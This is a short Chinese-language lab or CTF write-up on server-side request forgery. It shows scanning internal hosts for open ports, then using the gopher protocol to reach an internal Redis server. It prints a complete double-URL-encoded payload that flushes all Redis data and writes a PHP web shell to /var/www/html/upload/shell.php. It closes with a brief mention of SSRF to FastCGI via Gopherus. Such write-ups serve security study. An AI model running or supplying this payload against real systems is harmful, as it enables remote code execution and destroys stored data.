curl支持很多协议,有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDA
ssrf+redis
dict被禁用了用(?url=http://172.19.0.3+端口)来探测一下端口吧
172.19.0.3主机只开放一个80端口
看看内网还有其他服务器没
这里可以看到内网还有一台172.19.0.2的主机。
看看这台主机都开放什么端口吧
172.19.0.2主机除了80还有一个redis的6379端口
使用gopher协议写哥PHPShell试试
不能直接在/var/www/html目录下写文件
使用burp扫一下都有哪些目录,发现有一个upload这个文件夹。
我使用的的字典fuzzDicts/paramDict/parameter.txt at master · TheKingOfDuck/fuzzDicts · GitHub
使用gopher协议给/var/www/html/upload 目录下写入
这里payload需要再次用url进行编码
gopher%3A%2F%2F172%2E19%2E0%2E2%3A6379%2F%5F%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252423%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2527id%2527%2529%253B%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2Fvar%2Fwww%2Fhtml%2Fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell%2Ephp%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
看到upload目录里面有了shell.php,去访问一下。
ssrf+fastcgi
用docker拉去一个有fastcgi和一个有ssrf的漏洞平台
使用gopherus打一下
对payload再次url编码
